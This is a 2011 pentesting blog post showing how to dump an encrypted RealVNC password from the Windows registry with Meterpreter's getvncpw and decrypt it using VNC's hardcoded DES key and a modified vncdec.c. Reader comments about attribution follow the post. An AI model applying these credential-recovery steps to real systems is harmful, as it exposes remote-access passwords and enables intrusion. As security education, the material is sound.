Mar 16, 2011

VNC passwords and Metasploit and DES

Inside your Meterpreter shell, run getvncpw:
meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....

[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>

You're probably asking yourself what the F kind of password 3290e... is. It's the VNC password, DES-encrypted: VNC cuts the password to 8 characters, null-pads it to 8 bytes, and runs a single DES block over it. Lucky for us the key is hardcoded in the VNC source as the byte array {23, 82, 107, 6, 35, 78, 88, 7} (often written as 0x238210763578887, which is just those decimal bytes strung together; in hex it's 17 52 6b 06 23 4e 58 07), and since VNC is open source, the same DES code decrypts it. Two things worth knowing: anything past 8 characters is silently dropped, so no VNC auth password is ever longer than 8; and VNC's d3des library reads key bits least-significant-bit first, so if you use a stock DES implementation instead of VNC's own code you have to bit-mirror each key byte (e8 4a d6 60 c4 72 1a e0) to get the same result.
code here:

Change the relevant section of vncdec.c, putting your own hash in p[]:

/* put your password hash here in p[] */
char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};

getvncpw spit out 3290e903b5bf3769, so split the 16 hex characters into eight bytes:

char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};

Then compile and run it:

cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec

Or use this one, where you can just put your hash on the command line and don't have to recompile every time.



CG said...
This comment has been removed by the author.
Medt said...

At the end of every one of my posts I note where I got it from with "Source:", and in this post I gave the source as "Source: ".

Did you see it?

Medt said...

To CG: I'm so sorry, it was my mistake to delete your comment. I really didn't mean to do that. -*- Sorry again. And I want to tell you that for every post on this blog I always link to the source with "Source:"; I'm so sorry if you think I was unclear about the source of this article.